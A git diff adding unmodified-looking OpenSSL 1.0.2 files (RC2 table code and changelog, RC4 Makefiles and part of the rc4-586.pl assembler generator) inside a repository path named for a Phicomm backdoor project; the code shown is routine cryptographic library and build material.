+  15,  30,  77, 216, 165, 117, 107,  90, 169, 127, 143, 181, 208, 137, 200, 127,
+ 170, 195,  26,  84, 255, 132, 150,  58, 103, 250, 120, 221, 237,  37,   8,  99
+ 
+ 
+Implementation
+ 
+A non-US based programmer who has never seen any encryption code before will
+shortly be implementing RRC.2 based solely on this specification and not on
+knowledge of any other encryption algorithms.  Stand by.
+
+
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/tab.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/tab.c
new file mode 100644
index 0000000..0534e37
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/tab.c
@@ -0,0 +1,84 @@
+#include <stdio.h>
+
+unsigned char ebits_to_num[256] = {
+    0xbd, 0x56, 0xea, 0xf2, 0xa2, 0xf1, 0xac, 0x2a,
+    0xb0, 0x93, 0xd1, 0x9c, 0x1b, 0x33, 0xfd, 0xd0,
+    0x30, 0x04, 0xb6, 0xdc, 0x7d, 0xdf, 0x32, 0x4b,
+    0xf7, 0xcb, 0x45, 0x9b, 0x31, 0xbb, 0x21, 0x5a,
+    0x41, 0x9f, 0xe1, 0xd9, 0x4a, 0x4d, 0x9e, 0xda,
+    0xa0, 0x68, 0x2c, 0xc3, 0x27, 0x5f, 0x80, 0x36,
+    0x3e, 0xee, 0xfb, 0x95, 0x1a, 0xfe, 0xce, 0xa8,
+    0x34, 0xa9, 0x13, 0xf0, 0xa6, 0x3f, 0xd8, 0x0c,
+    0x78, 0x24, 0xaf, 0x23, 0x52, 0xc1, 0x67, 0x17,
+    0xf5, 0x66, 0x90, 0xe7, 0xe8, 0x07, 0xb8, 0x60,
+    0x48, 0xe6, 0x1e, 0x53, 0xf3, 0x92, 0xa4, 0x72,
+    0x8c, 0x08, 0x15, 0x6e, 0x86, 0x00, 0x84, 0xfa,
+    0xf4, 0x7f, 0x8a, 0x42, 0x19, 0xf6, 0xdb, 0xcd,
+    0x14, 0x8d, 0x50, 0x12, 0xba, 0x3c, 0x06, 0x4e,
+    0xec, 0xb3, 0x35, 0x11, 0xa1, 0x88, 0x8e, 0x2b,
+    0x94, 0x99, 0xb7, 0x71, 0x74, 0xd3, 0xe4, 0xbf,
+    0x3a, 0xde, 0x96, 0x0e, 0xbc, 0x0a, 0xed, 0x77,
+    0xfc, 0x37, 0x6b, 0x03, 0x79, 0x89, 0x62, 0xc6,
+    0xd7, 0xc0, 0xd2, 0x7c, 0x6a, 0x8b, 0x22, 0xa3,
+    0x5b, 0x05, 0x5d, 0x02, 0x75, 0xd5, 0x61, 0xe3,
+    0x18, 0x8f, 0x55, 0x51, 0xad, 0x1f, 0x0b, 0x5e,
+    0x85, 0xe5, 0xc2, 0x57, 0x63, 0xca, 0x3d, 0x6c,
+    0xb4, 0xc5, 0xcc, 0x70, 0xb2, 0x91, 0x59, 0x0d,
+    0x47, 0x20, 0xc8, 0x4f, 0x58, 0xe0, 0x01, 0xe2,
+    0x16, 0x38, 0xc4, 0x6f, 0x3b, 0x0f, 0x65, 0x46,
+    0xbe, 0x7e, 0x2d, 0x7b, 0x82, 0xf9, 0x40, 0xb5,
+    0x1d, 0x73, 0xf8, 0xeb, 0x26, 0xc7, 0x87, 0x97,
+    0x25, 0x54, 0xb1, 0x28, 0xaa, 0x98, 0x9d, 0xa5,
+    0x64, 0x6d, 0x7a, 0xd4, 0x10, 0x81, 0x44, 0xef,
+    0x49, 0xd6, 0xae, 0x2e, 0xdd, 0x76, 0x5c, 0x2f,
+    0xa7, 0x1c, 0xc9, 0x09, 0x69, 0x9a, 0x83, 0xcf,
+    0x29, 0x39, 0xb9, 0xe9, 0x4c, 0xff, 0x43, 0xab,
+};
+
+unsigned char num_to_ebits[256] = {
+    0x5d, 0xbe, 0x9b, 0x8b, 0x11, 0x99, 0x6e, 0x4d,
+    0x59, 0xf3, 0x85, 0xa6, 0x3f, 0xb7, 0x83, 0xc5,
+    0xe4, 0x73, 0x6b, 0x3a, 0x68, 0x5a, 0xc0, 0x47,
+    0xa0, 0x64, 0x34, 0x0c, 0xf1, 0xd0, 0x52, 0xa5,
+    0xb9, 0x1e, 0x96, 0x43, 0x41, 0xd8, 0xd4, 0x2c,
+    0xdb, 0xf8, 0x07, 0x77, 0x2a, 0xca, 0xeb, 0xef,
+    0x10, 0x1c, 0x16, 0x0d, 0x38, 0x72, 0x2f, 0x89,
+    0xc1, 0xf9, 0x80, 0xc4, 0x6d, 0xae, 0x30, 0x3d,
+    0xce, 0x20, 0x63, 0xfe, 0xe6, 0x1a, 0xc7, 0xb8,
+    0x50, 0xe8, 0x24, 0x17, 0xfc, 0x25, 0x6f, 0xbb,
+    0x6a, 0xa3, 0x44, 0x53, 0xd9, 0xa2, 0x01, 0xab,
+    0xbc, 0xb6, 0x1f, 0x98, 0xee, 0x9a, 0xa7, 0x2d,
+    0x4f, 0x9e, 0x8e, 0xac, 0xe0, 0xc6, 0x49, 0x46,
+    0x29, 0xf4, 0x94, 0x8a, 0xaf, 0xe1, 0x5b, 0xc3,
+    0xb3, 0x7b, 0x57, 0xd1, 0x7c, 0x9c, 0xed, 0x87,
+    0x40, 0x8c, 0xe2, 0xcb, 0x93, 0x14, 0xc9, 0x61,
+    0x2e, 0xe5, 0xcc, 0xf6, 0x5e, 0xa8, 0x5c, 0xd6,
+    0x75, 0x8d, 0x62, 0x95, 0x58, 0x69, 0x76, 0xa1,
+    0x4a, 0xb5, 0x55, 0x09, 0x78, 0x33, 0x82, 0xd7,
+    0xdd, 0x79, 0xf5, 0x1b, 0x0b, 0xde, 0x26, 0x21,
+    0x28, 0x74, 0x04, 0x97, 0x56, 0xdf, 0x3c, 0xf0,
+    0x37, 0x39, 0xdc, 0xff, 0x06, 0xa4, 0xea, 0x42,
+    0x08, 0xda, 0xb4, 0x71, 0xb0, 0xcf, 0x12, 0x7a,
+    0x4e, 0xfa, 0x6c, 0x1d, 0x84, 0x00, 0xc8, 0x7f,
+    0x91, 0x45, 0xaa, 0x2b, 0xc2, 0xb1, 0x8f, 0xd5,
+    0xba, 0xf2, 0xad, 0x19, 0xb2, 0x67, 0x36, 0xf7,
+    0x0f, 0x0a, 0x92, 0x7d, 0xe3, 0x9d, 0xe9, 0x90,
+    0x3e, 0x23, 0x27, 0x66, 0x13, 0xec, 0x81, 0x15,
+    0xbd, 0x22, 0xbf, 0x9f, 0x7e, 0xa9, 0x51, 0x4b,
+    0x4c, 0xfb, 0x02, 0xd3, 0x70, 0x86, 0x31, 0xe7,
+    0x3b, 0x05, 0x03, 0x54, 0x60, 0x48, 0x65, 0x18,
+    0xd2, 0xcd, 0x5f, 0x32, 0x88, 0x0e, 0x35, 0xfd,
+};
+
+main()
+{
+    int i, j;
+
+    for (i = 0; i < 256; i++) {
+        for (j = 0; j < 256; j++)
+            if (ebits_to_num[j] == i) {
+                printf("0x%02x,", j);
+                break;
+            }
+    }
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/version b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/version
new file mode 100644
index 0000000..6f89d59
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc2/version
@@ -0,0 +1,22 @@
+1.1 23/08/96 - eay
+	Changed RC2_set_key() so it now takes another argument.  Many
+	thanks to Peter Gutmann <pgut01@cs.auckland.ac.nz> for the
+	clarification and origional specification of RC2.  BSAFE uses
+	this last parameter, 'bits'.  It the key is 128 bits, BSAFE
+	also sets this parameter to 128.  The old behaviour can be
+	duplicated by setting this parameter to 1024.
+
+1.0 08/04/96 - eay
+	First version of SSLeay with rc2.  This has been written from the spec
+	posted sci.crypt.  It is in this directory under rrc2.doc
+	I have no test values for any mode other than ecb, my wrappers for the
+	other modes should be ok since they are basically the same as
+	the ones taken from idea and des :-).  I have implemented them as
+	little-endian operators.
+	While rc2 is included because it is used with SSL, I don't know how
+	far I trust it.  It is about the same speed as IDEA and DES.
+	So if you are paranoid, used Tripple DES, else IDEA.  If RC2
+	does get used more, perhaps more people will look for weaknesses in
+	it.
+	
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/Makefile
new file mode 100644
index 0000000..76860ae
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/Makefile
@@ -0,0 +1,125 @@
+#
+# OpenSSL/crypto/rc4/Makefile
+#
+
+DIR=	rc4
+TOP=	../..
+CC=	cc
+CPP=    $(CC) -E
+INCLUDES=
+CFLAG=-g
+AR=		ar r
+
+RC4_ENC=rc4_enc.o rc4_skey.o
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+TEST=rc4test.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=rc4_skey.c rc4_enc.c rc4_utl.c
+LIBOBJ=$(RC4_ENC) rc4_utl.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= rc4.h
+HEADER=	$(EXHEADER) rc4_locl.h
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+rc4-586.s:	asm/rc4-586.pl ../perlasm/x86asm.pl
+	$(PERL) asm/rc4-586.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+
+rc4-x86_64.s: asm/rc4-x86_64.pl
+	$(PERL) asm/rc4-x86_64.pl $(PERLASM_SCHEME) > $@
+rc4-md5-x86_64.s:	asm/rc4-md5-x86_64.pl
+	$(PERL) asm/rc4-md5-x86_64.pl $(PERLASM_SCHEME) > $@
+
+rc4-ia64.S: asm/rc4-ia64.pl
+	$(PERL) asm/rc4-ia64.pl $(CFLAGS) > $@
+
+rc4-parisc.s:	asm/rc4-parisc.pl
+	$(PERL) asm/rc4-parisc.pl $(PERLASM_SCHEME) $@
+
+rc4-ia64.s: rc4-ia64.S
+	@case `awk '/^#define RC4_INT/{print$$NF}' $(TOP)/include/openssl/opensslconf.h` in \
+	int)	set -x; $(CC) $(CFLAGS) -DSZ=4 -E rc4-ia64.S > $@ ;; \
+	char)	set -x; $(CC) $(CFLAGS) -DSZ=1 -E rc4-ia64.S > $@ ;; \
+	*)	exit 1 ;; \
+	esac
+
+# GNU make "catch all"
+rc4-%.s:	asm/rc4-%.pl;	$(PERL) $< $(PERLASM_SCHEME) $@
+
+files:
+	$(PERL) $(TOP)/util/files.pl "RC4_ENC=$(RC4_ENC)" Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.s *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+rc4_enc.o: ../../e_os.h ../../include/openssl/bio.h
+rc4_enc.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rc4_enc.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rc4_enc.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rc4_enc.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rc4_enc.o: ../../include/openssl/rc4.h ../../include/openssl/safestack.h
+rc4_enc.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rc4_enc.o: ../cryptlib.h rc4_enc.c rc4_locl.h
+rc4_skey.o: ../../e_os.h ../../include/openssl/bio.h
+rc4_skey.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rc4_skey.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rc4_skey.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rc4_skey.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rc4_skey.o: ../../include/openssl/rc4.h ../../include/openssl/safestack.h
+rc4_skey.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rc4_skey.o: ../cryptlib.h rc4_locl.h rc4_skey.c
+rc4_utl.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+rc4_utl.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+rc4_utl.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rc4.h
+rc4_utl.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+rc4_utl.o: ../../include/openssl/symhacks.h rc4_utl.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/Makefile.bak
new file mode 100644
index 0000000..76860ae
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/Makefile.bak
@@ -0,0 +1,125 @@
+#
+# OpenSSL/crypto/rc4/Makefile
+#
+
+DIR=	rc4
+TOP=	../..
+CC=	cc
+CPP=    $(CC) -E
+INCLUDES=
+CFLAG=-g
+AR=		ar r
+
+RC4_ENC=rc4_enc.o rc4_skey.o
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+TEST=rc4test.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=rc4_skey.c rc4_enc.c rc4_utl.c
+LIBOBJ=$(RC4_ENC) rc4_utl.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= rc4.h
+HEADER=	$(EXHEADER) rc4_locl.h
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+rc4-586.s:	asm/rc4-586.pl ../perlasm/x86asm.pl
+	$(PERL) asm/rc4-586.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+
+rc4-x86_64.s: asm/rc4-x86_64.pl
+	$(PERL) asm/rc4-x86_64.pl $(PERLASM_SCHEME) > $@
+rc4-md5-x86_64.s:	asm/rc4-md5-x86_64.pl
+	$(PERL) asm/rc4-md5-x86_64.pl $(PERLASM_SCHEME) > $@
+
+rc4-ia64.S: asm/rc4-ia64.pl
+	$(PERL) asm/rc4-ia64.pl $(CFLAGS) > $@
+
+rc4-parisc.s:	asm/rc4-parisc.pl
+	$(PERL) asm/rc4-parisc.pl $(PERLASM_SCHEME) $@
+
+rc4-ia64.s: rc4-ia64.S
+	@case `awk '/^#define RC4_INT/{print$$NF}' $(TOP)/include/openssl/opensslconf.h` in \
+	int)	set -x; $(CC) $(CFLAGS) -DSZ=4 -E rc4-ia64.S > $@ ;; \
+	char)	set -x; $(CC) $(CFLAGS) -DSZ=1 -E rc4-ia64.S > $@ ;; \
+	*)	exit 1 ;; \
+	esac
+
+# GNU make "catch all"
+rc4-%.s:	asm/rc4-%.pl;	$(PERL) $< $(PERLASM_SCHEME) $@
+
+files:
+	$(PERL) $(TOP)/util/files.pl "RC4_ENC=$(RC4_ENC)" Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.s *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+rc4_enc.o: ../../e_os.h ../../include/openssl/bio.h
+rc4_enc.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rc4_enc.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rc4_enc.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rc4_enc.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rc4_enc.o: ../../include/openssl/rc4.h ../../include/openssl/safestack.h
+rc4_enc.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rc4_enc.o: ../cryptlib.h rc4_enc.c rc4_locl.h
+rc4_skey.o: ../../e_os.h ../../include/openssl/bio.h
+rc4_skey.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rc4_skey.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rc4_skey.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rc4_skey.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rc4_skey.o: ../../include/openssl/rc4.h ../../include/openssl/safestack.h
+rc4_skey.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rc4_skey.o: ../cryptlib.h rc4_locl.h rc4_skey.c
+rc4_utl.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+rc4_utl.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+rc4_utl.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rc4.h
+rc4_utl.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+rc4_utl.o: ../../include/openssl/symhacks.h rc4_utl.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/Makefile.save
new file mode 100644
index 0000000..76860ae
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/Makefile.save
@@ -0,0 +1,125 @@
+#
+# OpenSSL/crypto/rc4/Makefile
+#
+
+DIR=	rc4
+TOP=	../..
+CC=	cc
+CPP=    $(CC) -E
+INCLUDES=
+CFLAG=-g
+AR=		ar r
+
+RC4_ENC=rc4_enc.o rc4_skey.o
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+TEST=rc4test.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=rc4_skey.c rc4_enc.c rc4_utl.c
+LIBOBJ=$(RC4_ENC) rc4_utl.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= rc4.h
+HEADER=	$(EXHEADER) rc4_locl.h
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+rc4-586.s:	asm/rc4-586.pl ../perlasm/x86asm.pl
+	$(PERL) asm/rc4-586.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+
+rc4-x86_64.s: asm/rc4-x86_64.pl
+	$(PERL) asm/rc4-x86_64.pl $(PERLASM_SCHEME) > $@
+rc4-md5-x86_64.s:	asm/rc4-md5-x86_64.pl
+	$(PERL) asm/rc4-md5-x86_64.pl $(PERLASM_SCHEME) > $@
+
+rc4-ia64.S: asm/rc4-ia64.pl
+	$(PERL) asm/rc4-ia64.pl $(CFLAGS) > $@
+
+rc4-parisc.s:	asm/rc4-parisc.pl
+	$(PERL) asm/rc4-parisc.pl $(PERLASM_SCHEME) $@
+
+rc4-ia64.s: rc4-ia64.S
+	@case `awk '/^#define RC4_INT/{print$$NF}' $(TOP)/include/openssl/opensslconf.h` in \
+	int)	set -x; $(CC) $(CFLAGS) -DSZ=4 -E rc4-ia64.S > $@ ;; \
+	char)	set -x; $(CC) $(CFLAGS) -DSZ=1 -E rc4-ia64.S > $@ ;; \
+	*)	exit 1 ;; \
+	esac
+
+# GNU make "catch all"
+rc4-%.s:	asm/rc4-%.pl;	$(PERL) $< $(PERLASM_SCHEME) $@
+
+files:
+	$(PERL) $(TOP)/util/files.pl "RC4_ENC=$(RC4_ENC)" Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.s *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+rc4_enc.o: ../../e_os.h ../../include/openssl/bio.h
+rc4_enc.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rc4_enc.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rc4_enc.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rc4_enc.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rc4_enc.o: ../../include/openssl/rc4.h ../../include/openssl/safestack.h
+rc4_enc.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rc4_enc.o: ../cryptlib.h rc4_enc.c rc4_locl.h
+rc4_skey.o: ../../e_os.h ../../include/openssl/bio.h
+rc4_skey.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+rc4_skey.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+rc4_skey.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+rc4_skey.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rc4_skey.o: ../../include/openssl/rc4.h ../../include/openssl/safestack.h
+rc4_skey.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rc4_skey.o: ../cryptlib.h rc4_locl.h rc4_skey.c
+rc4_utl.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+rc4_utl.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+rc4_utl.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rc4.h
+rc4_utl.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+rc4_utl.o: ../../include/openssl/symhacks.h rc4_utl.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/asm/rc4-586.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/asm/rc4-586.pl
new file mode 100644
index 0000000..1d55d55
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/asm/rc4-586.pl
@@ -0,0 +1,414 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# [Re]written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# At some point it became apparent that the original SSLeay RC4
+# assembler implementation performs suboptimally on latest IA-32
+# microarchitectures. After re-tuning performance has changed as
+# following:
+#
+# Pentium	-10%
+# Pentium III	+12%
+# AMD		+50%(*)
+# P4		+250%(**)
+#
+# (*)	This number is actually a trade-off:-) It's possible to
+#	achieve	+72%, but at the cost of -48% off PIII performance.
+#	In other words code performing further 13% faster on AMD
+#	would perform almost 2 times slower on Intel PIII...
+#	For reference! This code delivers ~80% of rc4-amd64.pl
+#	performance on the same Opteron machine.
+# (**)	This number requires compressed key schedule set up by
+#	RC4_set_key [see commentary below for further details].
+#
+#					<appro@fy.chalmers.se>
+
+# May 2011
+#
+# Optimize for Core2 and Westmere [and incidentally Opteron]. Current
+# performance in cycles per processed byte (less is better) and
+# improvement relative to previous version of this module is:
+#
+# Pentium	10.2			# original numbers
+# Pentium III	7.8(*)
+# Intel P4	7.5
+#
+# Opteron	6.1/+20%		# new MMX numbers
+# Core2		5.3/+67%(**)
+# Westmere	5.1/+94%(**)
+# Sandy Bridge	5.0/+8%
+# Atom		12.6/+6%
+#
+# (*)	PIII can actually deliver 6.6 cycles per byte with MMX code,
+#	but this specific code performs poorly on Core2. And vice
+#	versa, below MMX/SSE code delivering 5.8/7.1 on Core2 performs
+#	poorly on PIII, at 8.0/14.5:-( As PIII is not a "hot" CPU
+#	[anymore], I chose to discard PIII-specific code path and opt
+#	for original IALU-only code, which is why MMX/SSE code path
+#	is guarded by SSE2 bit (see below), not MMX/SSE.
+# (**)	Performance vs. block size on Core2 and Westmere had a maximum
+#	at ... 64 bytes block size. And it was quite a maximum, 40-60%
+#	in comparison to largest 8KB block size. Above improvement
+#	coefficients are for the largest block size.
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+push(@INC,"${dir}","${dir}../../perlasm");
+require "x86asm.pl";
+
+&asm_init($ARGV[0],"rc4-586.pl",$x86only = $ARGV[$#ARGV] eq "386");
+
+$xx="eax";
+$yy="ebx";
+$tx="ecx";
+$ty="edx";
+$inp="esi";
+$out="ebp";
+$dat="edi";
+
+sub RC4_loop {
+  my $i=shift;
+  my $func = ($i==0)?*mov:*or;
+
+	&add	(&LB($yy),&LB($tx));
+	&mov	($ty,&DWP(0,$dat,$yy,4));
+	&mov	(&DWP(0,$dat,$yy,4),$tx);
+	&mov	(&DWP(0,$dat,$xx,4),$ty);
+	&add	($ty,$tx);
+	&inc	(&LB($xx));
+	&and	($ty,0xff);
+	&ror	($out,8)	if ($i!=0);
+	if ($i<3) {
+	  &mov	($tx,&DWP(0,$dat,$xx,4));
+	} else {
+	  &mov	($tx,&wparam(3));	# reload [re-biased] out
+	}
+	&$func	($out,&DWP(0,$dat,$ty,4));
+}
+
+if ($alt=0) {
+  # >20% faster on Atom and Sandy Bridge[!], 8% faster on Opteron,
+  # but ~40% slower on Core2 and Westmere... Attempt to add movz
+  # brings down Opteron by 25%, Atom and Sandy Bridge by 15%, yet
+  # on Core2 with movz it's almost 20% slower than below alternative
+  # code... Yes, it's a total mess...
+  my @XX=($xx,$out);
+  $RC4_loop_mmx = sub {		# SSE actually...
+    my $i=shift;
+    my $j=$i<=0?0:$i>>1;
+    my $mm=$i<=0?"mm0":"mm".($i&1);
+
+	&add	(&LB($yy),&LB($tx));
+	&lea	(@XX[1],&DWP(1,@XX[0]));
+	&pxor	("mm2","mm0")				if ($i==0);
+	&psllq	("mm1",8)				if ($i==0);
+	&and	(@XX[1],0xff);
+	&pxor	("mm0","mm0")				if ($i<=0);
+	&mov	($ty,&DWP(0,$dat,$yy,4));
+	&mov	(&DWP(0,$dat,$yy,4),$tx);
+	&pxor	("mm1","mm2")				if ($i==0);
